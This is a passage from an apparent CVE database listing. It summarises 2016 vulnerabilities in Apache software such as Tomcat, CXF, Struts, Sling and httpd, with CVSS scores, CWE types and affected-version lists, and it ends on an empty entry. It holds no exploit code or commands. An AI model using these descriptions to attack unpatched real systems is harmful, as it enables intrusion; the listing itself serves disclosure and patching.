redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-6798 HIGH

In the XSS Protection API module before 1.0.12 in Apache Sling, the method XSS.getValidXML() uses an insecure SAX parser to validate the input string, which allows for XXE attacks in all scripts which use this method to validate user input, potentially allowing an attacker to read sensitive data on the filesystem, perform same-site-request-forgery (SSRF), port-scanning behind the firewall or DoS the application.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache sling *
CVE-2016-6799 MEDIUM

Product: Apache Cordova Android 5.2.2 and earlier. The application calls methods of the Log class. Messages passed to these methods (Log.v(), Log.d(), Log.i(), Log.w(), and Log.e()) are stored in a series of circular buffers on the device. By default, a maximum of four 16 KB rotated logs are kept in addition to the current log. The logged data can be read using Logcat on the device. When using platforms prior to Android 4.1 (Jelly Bean), the log data is not sandboxed per application; any application installed on the device has the capability to read data logged by other applications.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache cordova *
CVE-2016-6800 MEDIUM

The default configuration of the Apache OFBiz framework offers a blog functionality. Different users are able to operate blogs which are related to specific parties. In the form field for the creation of new blog articles the user input of the summary field as well as the article field is not properly sanitized. It is possible to inject arbitrary JavaScript code in these form fields. This code gets executed from the browser of every user who is visiting this article. Mitigation: Upgrade to Apache OFBiz 16.11.01.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 13.07
apache ofbiz 13.07.02
apache ofbiz 11.04.05
apache ofbiz 11.04.01
apache ofbiz 11.04.06
apache ofbiz 12.04.01
apache ofbiz 12.04.05
apache ofbiz 12.04
apache ofbiz 11.04.03
apache ofbiz 13.07.03
apache ofbiz 11.04
apache ofbiz 12.04.04
apache ofbiz 11.04.04
apache ofbiz 12.04.03
apache ofbiz 12.04.06
apache ofbiz 12.04.02
apache ofbiz 11.04.02
apache ofbiz 13.07.01
CVE-2016-6801 MEDIUM

Cross-site request forgery (CSRF) vulnerability in the CSRF content-type check in Jackrabbit-Webdav in Apache Jackrabbit 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.3, 2.10.x before 2.10.4, 2.12.x before 2.12.4, and 2.13.x before 2.13.3 allows remote attackers to hijack the authentication of unspecified victims for requests that create a resource via an HTTP POST request with a (1) missing or (2) crafted Content-Type header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache jackrabbit 2.4.0
apache jackrabbit 2.6.5
apache jackrabbit 2.6.1
apache jackrabbit 2.10.1
apache jackrabbit 2.12.2
apache jackrabbit 2.12.1
apache jackrabbit 2.12.3
apache jackrabbit 2.13.0
apache jackrabbit 2.4.4
apache jackrabbit 2.10.3
apache jackrabbit 2.12.0
apache jackrabbit 2.6.3
apache jackrabbit 2.4.2
apache jackrabbit 2.8.1
apache jackrabbit 2.10.2
apache jackrabbit 2.10.0
apache jackrabbit 2.13.2
apache jackrabbit 2.6.0
apache jackrabbit 2.4.3
apache jackrabbit 2.6.2
debian debian_linux 8.0
apache jackrabbit 2.8.0
apache jackrabbit 2.8.2
apache jackrabbit 2.4.1
apache jackrabbit 2.6.4
apache jackrabbit 2.4.5
apache jackrabbit 2.13.1
CVE-2016-6802 MEDIUM

Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache shiro 1.3.1
CVE-2016-6803 HIGH

An installer defect known as an "unquoted Windows search path vulnerability" affected the Apache OpenOffice before 4.1.3 installers for Windows. The PC must have previously been infected by a Trojan Horse application (or user) running with administrative privilege. Any installer with the unquoted search path vulnerability becomes a delayed trigger for the exploit.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-426,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2016-6804 HIGH

The Apache OpenOffice installer (versions prior to 4.1.3, including some branded as OpenOffice.org) for Windows contains a defective operation that allows execution of arbitrary code with elevated privileges. This requires that the location in which the installer is run has been previously poisoned by a file that impersonates a dynamic-link library that the installer depends upon.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2016-6805 MEDIUM

Apache Ignite before 1.9 allows man-in-the-middle attackers to read arbitrary files via XXE in modified update-notifier documents.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache ignite *
CVE-2016-6806 MEDIUM

Apache Wicket 6.x before 6.25.0, 7.x before 7.5.0, and 8.0.0-M1 provide a CSRF prevention measure that fails to discover some cross origin requests. The mitigation is to not only check the Origin HTTP header, but also take the Referer HTTP header into account when no Origin was provided. Furthermore, not all Wicket server side targets were subjected to the CSRF check. This was also fixed.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache wicket 7.0.0
apache wicket 6.24.0
apache wicket 7.4.0
apache wicket 6.23.0
apache wicket 8.0.0
apache wicket 7.1.0
apache wicket 7.2.0
apache wicket 7.3.0
apache wicket 6.21.0
apache wicket 6.22.0
apache wicket 6.20.0
CVE-2016-6807 HIGH

Custom commands may be executed on Ambari Agent (2.4.x, before 2.4.2) hosts without authorization, leading to unauthorized access to operations that may affect the underlying system. Such operations are invoked by the Ambari Agent process on Ambari Agent hosts, as the user executing the Ambari Agent process.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.4.1
CVE-2016-6808 HIGH

Buffer overflow in Apache Tomcat Connectors (mod_jk) before 1.2.42.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache tomcat_jk_connector *
CVE-2016-6809 HIGH

Apache Tika before 1.14 allows Java code execution for serialized objects embedded in MATLAB files. The issue exists because Tika invokes JMatIO to do native deserialization.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache nutch 2.3.1
apache tika *
CVE-2016-6810 MEDIUM

In Apache ActiveMQ 5.x before 5.14.2, an instance of a cross-site scripting vulnerability was identified to be present in the web based administration console. The root cause of this issue is improper user data output validation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq *
CVE-2016-6811 HIGH

In Apache Hadoop 2.x before 2.7.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2016-6812 MEDIUM

The HTTP transport module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 uses FormattedServiceListWriter to provide an HTML page which lists the names and absolute URL addresses of the available service endpoints. The module calculates the base URL using the current HttpServletRequest. The calculated base URL is used by FormattedServiceListWriter to build the service endpoint absolute URLs. If the unexpected matrix parameters have been injected into the request URL then these matrix parameters will find their way back to the client in the services list page which represents an XSS risk to the client.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache cxf 3.1.3
apache cxf 3.1.0
apache cxf *
apache cxf 3.1.4
apache cxf 3.1.8
apache cxf 3.1.5
apache cxf 3.1.6
apache cxf 3.1.2
apache cxf 3.1.1
apache cxf 3.1.7
CVE-2016-6813 HIGH

Apache CloudStack 4.1 to 4.8.1.0 and 4.9.0.0 contain an API call designed to allow a user to register for the developer API. If a malicious user is able to determine the ID of another (non-"root") CloudStack user, the malicious user may be able to reset the API keys for the other user, in turn accessing their account and resources.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.9.0
CVE-2016-6814 HIGH

When an application with unsupported Codehaus versions of Groovy from 1.7.0 to 2.4.3, Apache Groovy 2.4.4 to 2.4.7 on classpath uses standard Java serialization mechanisms, e.g. to communicate between servers or to store local data, it was possible for an attacker to bake a special serialized object that will execute code directly when deserialized. All applications which rely on serialization and do not isolate the code which deserializes objects were subject to this vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache groovy *
redhat enterprise_linux_server 7.0
CVE-2016-6815 MEDIUM

In Apache Ranger before 0.6.2, users with "keyadmin" role should not be allowed to change password for users with "admin" role.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.3
apache ranger 0.6.1
apache ranger 0.4.0
apache ranger 0.5.2
apache ranger 0.6.0
apache ranger 0.5.0
CVE-2016-6816 MEDIUM

The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other than their own.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 8.5.2
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 6.0.42
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 8.0.32
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 6.0.24
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.46
apache tomcat 6.0.1
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.38
apache tomcat 8.0.37
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 7.0.17
apache tomcat 6.0.22
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 6.0.17
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 6.0.45
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 6.0.47
apache tomcat 6.0.25
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 6.0.6
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 6.0.40
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 8.0.38
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 6.0.9
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
apache tomcat 6.0.35
CVE-2016-6817 MEDIUM

The HTTP/2 header parser in Apache Tomcat 9.0.0.M1 to 9.0.0.M11 and 8.5.0 to 8.5.6 entered an infinite loop if a header was received that was larger than the available buffer. This made a denial of service attack possible.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,CWE-835,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.4
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 9.0.0
apache tomcat 8.5.5
apache tomcat 8.5.0
apache tomcat 8.5.3
CVE-2016-8612 LOW

Apache HTTP Server mod_cluster before version httpd 2.4.23 is vulnerable to an Improper Input Validation in the protocol parsing logic in the load balancer resulting in a Segmentation Fault in the serving httpd process.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
redhat enterprise_linux 6.0
apache http_server *
redhat enterprise_linux 7.0
netapp storage_automation_store -
CVE-2016-8734 MEDIUM

Apache Subversion's mod_dontdothat module and HTTP clients 1.4.0 through 1.8.16, and 1.9.0 through 1.9.4 are vulnerable to a denial-of-service attack caused by exponential XML entity expansion. The attack can cause the targeted process to consume an excessive amount of CPU resources or memory.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache subversion 1.8.12
apache subversion 1.9.1
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.8.13
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.9.0
apache subversion 1.7.19
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
debian debian_linux 9.0
apache subversion 1.8.6
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
debian debian_linux 8.0
apache subversion 1.6.13
apache subversion 1.7.20
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.9.4
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.8.15
apache subversion 1.6.21
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.5.7
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.9.3
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.14
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.4.5
apache subversion 1.8.16
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.9.2
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2016-8735 HIGH

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle micros_relate_crm_software 11.4
apache tomcat 8.0.20
oracle agile_engineering_data_management 6.2.1.0
oracle micros_retail_xbri_loss_prevention 10.7.7
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.11
redhat jboss_enterprise_web_server 3.0.0
apache tomcat 6.0.37
apache tomcat 8.5.2
oracle transportation_management 6.3.3
apache tomcat 7.0.62
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 6.0.28
apache tomcat 8.5.4
apache tomcat 6.0.33
oracle transportation_management 6.3.0
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat *
apache tomcat 7.0.43
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
netapp oncommand_insight -
oracle communications_application_session_controller 3.7.1
apache tomcat 6.0.26
apache tomcat 6.0.34
apache tomcat 7.0.24
apache tomcat 6.0.20
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.6
oracle agile_engineering_data_management 6.1.3
apache tomcat 7.0.8
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 6.0.46
oracle agile_plm 9.3.6
apache tomcat 6.0.27
apache tomcat 6.0.38
apache tomcat 7.0.41
oracle transportation_management 6.3.5
apache tomcat 7.0.31
apache tomcat 6.0.15
apache tomcat 8.0.5
debian debian_linux 8.0
oracle micros_relate_crm_software 10.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.48
oracle hospitality_guest_access 4.2.1
oracle communications_interactive_session_recorder 6.0
apache tomcat 6.0.25
apache tomcat 7.0.42
apache tomcat 7.0.61
apache tomcat 7.0.29
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 6.0.40
apache tomcat 7.0.26
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.52
apache tomcat 6.0.9
oracle micros_retail_xbri_loss_prevention 10.0.1
apache tomcat 6.0.35
oracle micros_retail_xbri_loss_prevention 10.8.0
apache tomcat 8.5.5
apache tomcat 8.0.22
oracle agile_engineering_data_management 6.2.0
apache tomcat 6.0.43
apache tomcat 8.0.3
oracle hospitality_guest_access 4.2.0
apache tomcat 6.0.29
apache tomcat 8.0.35
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
oracle communications_interactive_session_recorder 6.1
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 7.0.38
apache tomcat 7.0.9
apache tomcat 6.0.42
apache tomcat 7.0.18
apache tomcat 7.0.7
netapp 7-mode_transition_tool -
oracle communications_interactive_session_recorder 6.2
oracle transportation_management 6.3.6
apache tomcat 6.0.18
apache tomcat 7.0.34
oracle micros_retail_xbri_loss_prevention 10.5.0
apache tomcat 6.0.31
apache tomcat 6.0.30
apache tomcat 7.0.45
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.27
oracle transportation_management 6.3.7
oracle retail_convenience_and_fuel_pos_software 2.1.132
apache tomcat 7.0.69
apache tomcat 8.0.13
apache tomcat 8.0.31
oracle communications_instant_messaging_server 10.0.1
apache tomcat 6.0.24
apache tomcat 6.0.14
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
oracle transportation_management 6.3.1
apache tomcat 6.0.8
oracle transportation_management 6.3.4
apache tomcat 7.0.50
oracle micros_retail_xbri_loss_prevention 10.8.1
apache tomcat 6.0.12
netapp snap_creator_framework -
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 8.0.23
apache tomcat 6.0.44
oracle micros_retail_xbri_loss_prevention 10.6.0
apache tomcat 6.0.22
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
oracle communications_application_session_controller 3.8.0
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 6.0.17
apache tomcat 8.0.34
apache tomcat 6.0.45
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 6.0.47
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 6.0.39
apache tomcat 7.0.46
oracle agile_plm 9.3.5
oracle mysql_enterprise_monitor *
apache tomcat 8.0.9
apache tomcat 6.0.6
apache tomcat 6.0.10
apache tomcat 7.0.49
apache tomcat 8.0.1
netapp oncommand_shift -
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 6.0.0
apache tomcat 6.0.11
apache tomcat 8.0.38
apache tomcat 7.0.2
oracle transportation_management 6.3.2
apache tomcat 8.0.28
apache tomcat 6.0.19
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2016-8736 HIGH

Apache OpenMeetings before 3.1.2 is vulnerable to Remote Code Execution via RMI deserialization attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-8737 MEDIUM

In Apache Brooklyn before 0.10.0, the REST server is vulnerable to cross-site request forgery (CSRF), which could permit a malicious web site to produce a link which, if clicked whilst a user is logged in to Brooklyn, would cause the server to execute the attacker's commands as the user. There is known to be a proof-of-concept exploit using this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache brooklyn *
CVE-2016-8738 MEDIUM

In Apache Struts 2.5 through 2.5.5, if an application allows entering a URL in a form field and the built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload the server process when performing validation of the URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.5
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.5.5
apache struts 2.5.2
apache struts 2.5.1
CVE-2016-8739 HIGH

The JAX-RS module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 provides a number of Atom JAX-RS MessageBodyReaders. These readers use the Apache Abdera Parser, which expands XML entities by default, which represents a major XXE risk.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache cxf 3.1.3
apache cxf 3.1.0
apache cxf *
apache cxf 3.1.4
apache cxf 3.1.8
apache cxf 3.1.5
apache cxf 3.1.6
apache cxf 3.1.2
apache cxf 3.1.1
apache cxf 3.1.7
CVE-2016-8740 MEDIUM

The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.4.17
apache http_server 2.4.19
apache http_server 2.4.21
apache http_server 2.4.23
apache http_server 2.4.20
apache http_server 2.4.18
apache http_server 2.4.22
CVE-2016-8741 MEDIUM

The Apache Qpid Broker for Java can be configured to use different so-called AuthenticationProviders to handle user authentication. Among the choices are the SCRAM-SHA-1 and SCRAM-SHA-256 AuthenticationProvider types. It was discovered that these AuthenticationProviders in Apache Qpid Broker for Java 6.0.x before 6.0.6 and 6.1.x before 6.1.1 prematurely terminate the SCRAM SASL negotiation if the provided user name does not exist, thus allowing a remote attacker to determine the existence of user accounts. The vulnerability does not apply to AuthenticationProviders other than SCRAM-SHA-1 and SCRAM-SHA-256.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache qpid_broker-j 6.0.3
apache qpid_broker-j 6.0.4
apache qpid_broker-j 6.0.2
apache qpid_broker-j 6.0.5
apache qpid_broker-j 6.1.0
apache qpid_broker-j 6.0.1
CVE-2016-8742 HIGH

The Windows installer that the Apache CouchDB team provides was vulnerable to local privilege escalation. All files in the install inherit the file permissions of the parent directory and therefore a non-privileged user can substitute any executable for the nssm.exe service launcher, or CouchDB batch or binary files. A subsequent service or server restart will then run that binary with administrator privilege. This issue affected CouchDB 2.0.0 (Windows platform only) and was addressed in CouchDB 2.0.0.1.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache couchdb 2.0.0
CVE-2016-8743 MEDIUM

Apache HTTP Server, in all releases prior to 2.2.32 and 2.4.25, was liberal in the whitespace accepted from requests and sent in response lines and headers. Accepting these different behaviors represented a security concern when httpd participates in any chain of proxies or interacts with back-end application servers, either through mod_proxy or using conventional CGI mechanisms, and may result in request smuggling, response splitting and cache pollution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat jboss_core_services 1.0
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 7.0
CVE-2016-8744 HIGH

Apache Brooklyn uses the SnakeYAML library for parsing YAML inputs. SnakeYAML allows the use of YAML tags to indicate that SnakeYAML should unmarshal data to a Java type. In the default configuration in Brooklyn before 0.10.0, SnakeYAML will allow unmarshalling to any Java type available on the classpath. This could provide an authenticated user with a means to cause the JVM running Brooklyn to load and run Java code without detection by Brooklyn. Such code would have the privileges of the Java process running Brooklyn, including the ability to open files and network connections, and execute system commands. There is known to be a proof-of-concept exploit using this vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache brooklyn *
CVE-2016-8745 MEDIUM

